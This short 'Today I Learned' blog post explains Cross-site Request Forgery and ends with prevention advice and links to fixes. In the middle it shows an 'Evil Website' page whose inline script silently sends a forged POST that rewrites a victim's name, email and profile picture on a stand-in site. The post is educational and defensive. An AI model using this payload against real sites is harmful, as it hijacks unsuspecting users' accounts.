---
title: TIL CSRF Attacks
date: 2022-12-08
published: true
tags: ['security', 'hack', 'forms']
series: false
canonical_url: false
description: "Cross-site Request Forgery (CSRF) is submitting post data from a fake site. To prevent CSRF attacks, web applications should implement measures such as requiring a valid CSRF token to be included with each request, checking the referer header, and using secure cookies."
layout: layouts/post.njk
---


Today I learned about Cross-site Request Forgery (CSRF).

Assume this is the real site, and how it looks.

```html

<!DOCTYPE html>
<html>
<head>
	<title>Update Profile</title>
</head>
<body>
	<h1>Update Profile</h1>
	<form method="POST" action="/update-profile">
		<label for="name">Name:</label>
		<input type="text" name="name" id="name" /><br/><br/>
		<label for="email">Email:</label>
		<input type="email" name="email" id="email" /><br/><br/>
		<label for="profile-picture">Profile Picture:</label>
		<input type="file" name="profile-picture" id="profile-picture" /><br/><br/>
		<input type="submit" value="Update Profile" />
	</form>
</body>
</html>
```

Now they visit a malicious evil site, which fires off this script.

tl;dr - It's trying to update the user's profile.

```html
<!DOCTYPE html>
<html>
<head>
	<title>Evil Website</title>
</head>
<body>
	<h1>Evil Website</h1>
	<script>
		// Send a POST request to update the victim's profile picture
		var xhr = new XMLHttpRequest();
		xhr.open('POST', 'https://fake-starwars-website.com/update-profile', true);
		xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
		xhr.send('name=Evil%20Attacker&email=evil%40attacker.com&profile-picture=https://evil.com/evil-profile-picture.jpg');
	</script>
</body>
</html>
```
If the website original does not properly authenticate these requests, it may be vulnerable to CSRF attacks.


## How to prevent it
To prevent CSRF attacks, web applications should implement measures such as requiring a valid CSRF token to be included with each request, checking the referer header, and using secure cookies.


## Fixing it

PHP Version: https://phppot.com/php/cross-site-request-forgery-anti-csrf-protection-in-php/

Node Version: https://levelup.gitconnected.com/prevent-csrf-attacks-in-node-js-application-d71df3704944?gi=a11e46a11be4
